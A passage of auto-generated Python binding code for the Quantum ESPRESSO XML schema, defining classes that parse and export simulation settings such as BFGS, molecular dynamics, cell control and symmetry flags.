outfile.write('<qes:upscale>%s</qes:upscale>%s' % (self.gds_format_double(self.upscale, input_name='upscale'), eol_))
if self.remove_rigid_rot is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:remove_rigid_rot>%s</qes:remove_rigid_rot>%s' % (self.gds_format_boolean(self.remove_rigid_rot, input_name='remove_rigid_rot'), eol_))
if self.refold_pos is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:refold_pos>%s</qes:refold_pos>%s' % (self.gds_format_boolean(self.refold_pos, input_name='refold_pos'), eol_))
if self.bfgs is not None:
self.bfgs.export(outfile, level, namespaceprefix_, name_='bfgs', pretty_print=pretty_print)
if self.md is not None:
self.md.export(outfile, level, namespaceprefix_, name_='md', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ion_dynamics':
ion_dynamics_ = child_.text
ion_dynamics_ = self.gds_validate_string(ion_dynamics_, node, 'ion_dynamics')
self.ion_dynamics = ion_dynamics_
elif nodeName_ == 'upscale' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'upscale')
self.upscale = fval_
elif nodeName_ == 'remove_rigid_rot':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'remove_rigid_rot')
self.remove_rigid_rot = ival_
elif nodeName_ == 'refold_pos':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'refold_pos')
self.refold_pos = ival_
elif nodeName_ == 'bfgs':
obj_ = bfgsType.factory()
obj_.build(child_)
self.bfgs = obj_
obj_.original_tagname_ = 'bfgs'
elif nodeName_ == 'md':
obj_ = mdType.factory()
obj_.build(child_)
self.md = obj_
obj_.original_tagname_ = 'md'
# end class ion_controlType
class bfgsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, ndim=None, trust_radius_min=None, trust_radius_max=None, trust_radius_init=None, w1=None, w2=None):
self.original_tagname_ = None
self.ndim = ndim
self.trust_radius_min = trust_radius_min
self.trust_radius_max = trust_radius_max
self.trust_radius_init = trust_radius_init
self.w1 = w1
self.w2 = w2
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, bfgsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if bfgsType.subclass:
return bfgsType.subclass(*args_, **kwargs_)
else:
return bfgsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ndim(self): return self.ndim
def set_ndim(self, ndim): self.ndim = ndim
def get_trust_radius_min(self): return self.trust_radius_min
def set_trust_radius_min(self, trust_radius_min): self.trust_radius_min = trust_radius_min
def get_trust_radius_max(self): return self.trust_radius_max
def set_trust_radius_max(self, trust_radius_max): self.trust_radius_max = trust_radius_max
def get_trust_radius_init(self): return self.trust_radius_init
def set_trust_radius_init(self, trust_radius_init): self.trust_radius_init = trust_radius_init
def get_w1(self): return self.w1
def set_w1(self, w1): self.w1 = w1
def get_w2(self): return self.w2
def set_w2(self, w2): self.w2 = w2
def hasContent_(self):
if (
self.ndim is not None or
self.trust_radius_min is not None or
self.trust_radius_max is not None or
self.trust_radius_init is not None or
self.w1 is not None or
self.w2 is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='bfgsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('bfgsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='bfgsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='bfgsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='bfgsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='bfgsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.ndim is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ndim>%s</qes:ndim>%s' % (self.gds_format_integer(self.ndim, input_name='ndim'), eol_))
if self.trust_radius_min is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:trust_radius_min>%s</qes:trust_radius_min>%s' % (self.gds_format_double(self.trust_radius_min, input_name='trust_radius_min'), eol_))
if self.trust_radius_max is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:trust_radius_max>%s</qes:trust_radius_max>%s' % (self.gds_format_double(self.trust_radius_max, input_name='trust_radius_max'), eol_))
if self.trust_radius_init is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:trust_radius_init>%s</qes:trust_radius_init>%s' % (self.gds_format_double(self.trust_radius_init, input_name='trust_radius_init'), eol_))
if self.w1 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:w1>%s</qes:w1>%s' % (self.gds_format_double(self.w1, input_name='w1'), eol_))
if self.w2 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:w2>%s</qes:w2>%s' % (self.gds_format_double(self.w2, input_name='w2'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ndim' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'ndim')
self.ndim = ival_
elif nodeName_ == 'trust_radius_min' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'trust_radius_min')
self.trust_radius_min = fval_
elif nodeName_ == 'trust_radius_max' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'trust_radius_max')
self.trust_radius_max = fval_
elif nodeName_ == 'trust_radius_init' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'trust_radius_init')
self.trust_radius_init = fval_
elif nodeName_ == 'w1' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'w1')
self.w1 = fval_
elif nodeName_ == 'w2' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'w2')
self.w2 = fval_
# end class bfgsType
class mdType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, pot_extrapolation=None, wfc_extrapolation=None, ion_temperature=None, timestep=20.0, tempw=None, tolp=None, deltaT=None, nraise=None):
self.original_tagname_ = None
self.pot_extrapolation = pot_extrapolation
self.wfc_extrapolation = wfc_extrapolation
self.ion_temperature = ion_temperature
self.timestep = timestep
self.tempw = tempw
self.tolp = tolp
self.deltaT = deltaT
self.nraise = nraise
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, mdType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if mdType.subclass:
return mdType.subclass(*args_, **kwargs_)
else:
return mdType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_pot_extrapolation(self): return self.pot_extrapolation
def set_pot_extrapolation(self, pot_extrapolation): self.pot_extrapolation = pot_extrapolation
def get_wfc_extrapolation(self): return self.wfc_extrapolation
def set_wfc_extrapolation(self, wfc_extrapolation): self.wfc_extrapolation = wfc_extrapolation
def get_ion_temperature(self): return self.ion_temperature
def set_ion_temperature(self, ion_temperature): self.ion_temperature = ion_temperature
def get_timestep(self): return self.timestep
def set_timestep(self, timestep): self.timestep = timestep
def get_tempw(self): return self.tempw
def set_tempw(self, tempw): self.tempw = tempw
def get_tolp(self): return self.tolp
def set_tolp(self, tolp): self.tolp = tolp
def get_deltaT(self): return self.deltaT
def set_deltaT(self, deltaT): self.deltaT = deltaT
def get_nraise(self): return self.nraise
def set_nraise(self, nraise): self.nraise = nraise
def hasContent_(self):
if (
self.pot_extrapolation is not None or
self.wfc_extrapolation is not None or
self.ion_temperature is not None or
self.timestep != 20.0 or
self.tempw is not None or
self.tolp is not None or
self.deltaT is not None or
self.nraise is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='mdType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('mdType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='mdType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='mdType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='mdType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='mdType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.pot_extrapolation is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:pot_extrapolation>%s</qes:pot_extrapolation>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.pot_extrapolation), input_name='pot_extrapolation')), eol_))
if self.wfc_extrapolation is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:wfc_extrapolation>%s</qes:wfc_extrapolation>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.wfc_extrapolation), input_name='wfc_extrapolation')), eol_))
if self.ion_temperature is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ion_temperature>%s</qes:ion_temperature>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ion_temperature), input_name='ion_temperature')), eol_))
if self.timestep is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:timestep>%s</qes:timestep>%s' % (self.gds_format_double(self.timestep, input_name='timestep'), eol_))
if self.tempw is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tempw>%s</qes:tempw>%s' % (self.gds_format_double(self.tempw, input_name='tempw'), eol_))
if self.tolp is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tolp>%s</qes:tolp>%s' % (self.gds_format_double(self.tolp, input_name='tolp'), eol_))
if self.deltaT is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:deltaT>%s</qes:deltaT>%s' % (self.gds_format_double(self.deltaT, input_name='deltaT'), eol_))
if self.nraise is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nraise>%s</qes:nraise>%s' % (self.gds_format_integer(self.nraise, input_name='nraise'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'pot_extrapolation':
pot_extrapolation_ = child_.text
pot_extrapolation_ = self.gds_validate_string(pot_extrapolation_, node, 'pot_extrapolation')
self.pot_extrapolation = pot_extrapolation_
elif nodeName_ == 'wfc_extrapolation':
wfc_extrapolation_ = child_.text
wfc_extrapolation_ = self.gds_validate_string(wfc_extrapolation_, node, 'wfc_extrapolation')
self.wfc_extrapolation = wfc_extrapolation_
elif nodeName_ == 'ion_temperature':
ion_temperature_ = child_.text
ion_temperature_ = self.gds_validate_string(ion_temperature_, node, 'ion_temperature')
self.ion_temperature = ion_temperature_
elif nodeName_ == 'timestep' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'timestep')
self.timestep = fval_
elif nodeName_ == 'tempw' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'tempw')
self.tempw = fval_
elif nodeName_ == 'tolp' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'tolp')
self.tolp = fval_
elif nodeName_ == 'deltaT' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'deltaT')
self.deltaT = fval_
elif nodeName_ == 'nraise' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nraise')
self.nraise = ival_
# end class mdType
class cell_controlType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, cell_dynamics=None, pressure=0.0, wmass=None, cell_factor=None, fix_volume=None, fix_area=None, fix_xy=None, isotropic=None, free_cell=None):
self.original_tagname_ = None
self.cell_dynamics = cell_dynamics
self.pressure = pressure
self.wmass = wmass
self.cell_factor = cell_factor
self.fix_volume = fix_volume
self.fix_area = fix_area
self.fix_xy = fix_xy
self.isotropic = isotropic
self.free_cell = free_cell
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, cell_controlType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if cell_controlType.subclass:
return cell_controlType.subclass(*args_, **kwargs_)
else:
return cell_controlType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_cell_dynamics(self): return self.cell_dynamics
def set_cell_dynamics(self, cell_dynamics): self.cell_dynamics = cell_dynamics
def get_pressure(self): return self.pressure
def set_pressure(self, pressure): self.pressure = pressure
def get_wmass(self): return self.wmass
def set_wmass(self, wmass): self.wmass = wmass
def get_cell_factor(self): return self.cell_factor
def set_cell_factor(self, cell_factor): self.cell_factor = cell_factor
def get_fix_volume(self): return self.fix_volume
def set_fix_volume(self, fix_volume): self.fix_volume = fix_volume
def get_fix_area(self): return self.fix_area
def set_fix_area(self, fix_area): self.fix_area = fix_area
def get_fix_xy(self): return self.fix_xy
def set_fix_xy(self, fix_xy): self.fix_xy = fix_xy
def get_isotropic(self): return self.isotropic
def set_isotropic(self, isotropic): self.isotropic = isotropic
def get_free_cell(self): return self.free_cell
def set_free_cell(self, free_cell): self.free_cell = free_cell
def hasContent_(self):
if (
self.cell_dynamics is not None or
self.pressure != 0.0 or
self.wmass is not None or
self.cell_factor is not None or
self.fix_volume is not None or
self.fix_area is not None or
self.fix_xy is not None or
self.isotropic is not None or
self.free_cell is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='cell_controlType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('cell_controlType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='cell_controlType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='cell_controlType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='cell_controlType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='cell_controlType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.cell_dynamics is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:cell_dynamics>%s</qes:cell_dynamics>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.cell_dynamics), input_name='cell_dynamics')), eol_))
if self.pressure is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:pressure>%s</qes:pressure>%s' % (self.gds_format_double(self.pressure, input_name='pressure'), eol_))
if self.wmass is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:wmass>%s</qes:wmass>%s' % (self.gds_format_double(self.wmass, input_name='wmass'), eol_))
if self.cell_factor is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:cell_factor>%s</qes:cell_factor>%s' % (self.gds_format_double(self.cell_factor, input_name='cell_factor'), eol_))
if self.fix_volume is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fix_volume>%s</qes:fix_volume>%s' % (self.gds_format_boolean(self.fix_volume, input_name='fix_volume'), eol_))
if self.fix_area is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fix_area>%s</qes:fix_area>%s' % (self.gds_format_boolean(self.fix_area, input_name='fix_area'), eol_))
if self.fix_xy is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fix_xy>%s</qes:fix_xy>%s' % (self.gds_format_boolean(self.fix_xy, input_name='fix_xy'), eol_))
if self.isotropic is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:isotropic>%s</qes:isotropic>%s' % (self.gds_format_boolean(self.isotropic, input_name='isotropic'), eol_))
if self.free_cell is not None:
self.free_cell.export(outfile, level, namespaceprefix_, name_='free_cell', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'cell_dynamics':
cell_dynamics_ = child_.text
cell_dynamics_ = self.gds_validate_string(cell_dynamics_, node, 'cell_dynamics')
self.cell_dynamics = cell_dynamics_
elif nodeName_ == 'pressure' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'pressure')
self.pressure = fval_
elif nodeName_ == 'wmass' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'wmass')
self.wmass = fval_
elif nodeName_ == 'cell_factor' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'cell_factor')
self.cell_factor = fval_
elif nodeName_ == 'fix_volume':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'fix_volume')
self.fix_volume = ival_
elif nodeName_ == 'fix_area':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'fix_area')
self.fix_area = ival_
elif nodeName_ == 'fix_xy':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'fix_xy')
self.fix_xy = ival_
elif nodeName_ == 'isotropic':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'isotropic')
self.isotropic = ival_
elif nodeName_ == 'free_cell':
obj_ = integerMatrixType.factory()
obj_.build(child_)
self.free_cell = obj_
obj_.original_tagname_ = 'free_cell'
# end class cell_controlType
class symmetry_flagsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nosym=None, nosym_evc=None, noinv=None, no_t_rev=None, force_symmorphic=None, use_all_frac=None):
self.original_tagname_ = None
self.nosym = nosym
self.nosym_evc = nosym_evc
self.noinv = noinv
self.no_t_rev = no_t_rev
self.force_symmorphic = force_symmorphic
self.use_all_frac = use_all_frac
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, symmetry_flagsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if symmetry_flagsType.subclass:
return symmetry_flagsType.subclass(*args_, **kwargs_)
else:
return symmetry_flagsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nosym(self): return self.nosym
def set_nosym(self, nosym): self.nosym = nosym
def get_nosym_evc(self): return self.nosym_evc
def set_nosym_evc(self, nosym_evc): self.nosym_evc = nosym_evc
def get_noinv(self): return self.noinv
def set_noinv(self, noinv): self.noinv = noinv
def get_no_t_rev(self): return self.no_t_rev
def set_no_t_rev(self, no_t_rev): self.no_t_rev = no_t_rev
def get_force_symmorphic(self): return self.force_symmorphic
def set_force_symmorphic(self, force_symmorphic): self.force_symmorphic = force_symmorphic
def get_use_all_frac(self): return self.use_all_frac
def set_use_all_frac(self, use_all_frac): self.use_all_frac = use_all_frac
def hasContent_(self):
if (
self.nosym is not None or
self.nosym_evc is not None or
self.noinv is not None or
self.no_t_rev is not None or
self.force_symmorphic is not None or
self.use_all_frac is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='symmetry_flagsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('symmetry_flagsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='symmetry_flagsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='symmetry_flagsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='symmetry_flagsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='symmetry_flagsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.nosym is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nosym>%s</qes:nosym>%s' % (self.gds_format_boolean(self.nosym, input_name='nosym'), eol_))
if self.nosym_evc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nosym_evc>%s</qes:nosym_evc>%s' % (self.gds_format_boolean(self.nosym_evc, input_name='nosym_evc'), eol_))
if self.noinv is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:noinv>%s</qes:noinv>%s' % (self.gds_format_boolean(self.noinv, input_name='noinv'), eol_))
if self.no_t_rev is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:no_t_rev>%s</qes:no_t_rev>%s' % (self.gds_format_boolean(self.no_t_rev, input_name='no_t_rev'), eol_))
if self.force_symmorphic is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:force_symmorphic>%s</qes:force_symmorphic>%s' % (self.gds_format_boolean(self.force_symmorphic, input_name='force_symmorphic'), eol_))
if self.use_all_frac is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:use_all_frac>%s</qes:use_all_frac>%s' % (self.gds_format_boolean(self.use_all_frac, input_name='use_all_frac'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'nosym':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'nosym')
self.nosym = ival_
elif nodeName_ == 'nosym_evc':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'nosym_evc')
self.nosym_evc = ival_
elif nodeName_ == 'noinv':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'noinv')
self.noinv = ival_
elif nodeName_ == 'no_t_rev':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'no_t_rev')
self.no_t_rev = ival_
elif nodeName_ == 'force_symmorphic':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'force_symmorphic')
self.force_symmorphic = ival_
elif nodeName_ == 'use_all_frac':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'use_all_frac')
self.use_all_frac = ival_
# end class symmetry_flagsType
class boundary_conditionsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, assume_isolated=None, esm=None, fcp_opt=None, fcp_mu=None):
self.original_tagname_ = None
self.assume_isolated = assume_isolated
self.esm = esm
self.fcp_opt = fcp_opt
self.fcp_mu = fcp_mu
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, boundary_conditionsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if boundary_conditionsType.subclass:
return boundary_conditionsType.subclass(*args_, **kwargs_)
else:
return boundary_conditionsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_assume_isolated(self): return self.assume_isolated
def set_assume_isolated(self, assume_isolated): self.assume_isolated = assume_isolated
def get_esm(self): return self.esm
def set_esm(self, esm): self.esm = esm
def get_fcp_opt(self): return self.fcp_opt
def set_fcp_opt(self, fcp_opt): self.fcp_opt = fcp_opt
def get_fcp_mu(self): return self.fcp_mu
def set_fcp_mu(self, fcp_mu): self.fcp_mu = fcp_mu
def hasContent_(self):
if (
self.assume_isolated is not None or
self.esm is not None or
self.fcp_opt is not None or
self.fcp_mu is not None
):
return True
else:
return False
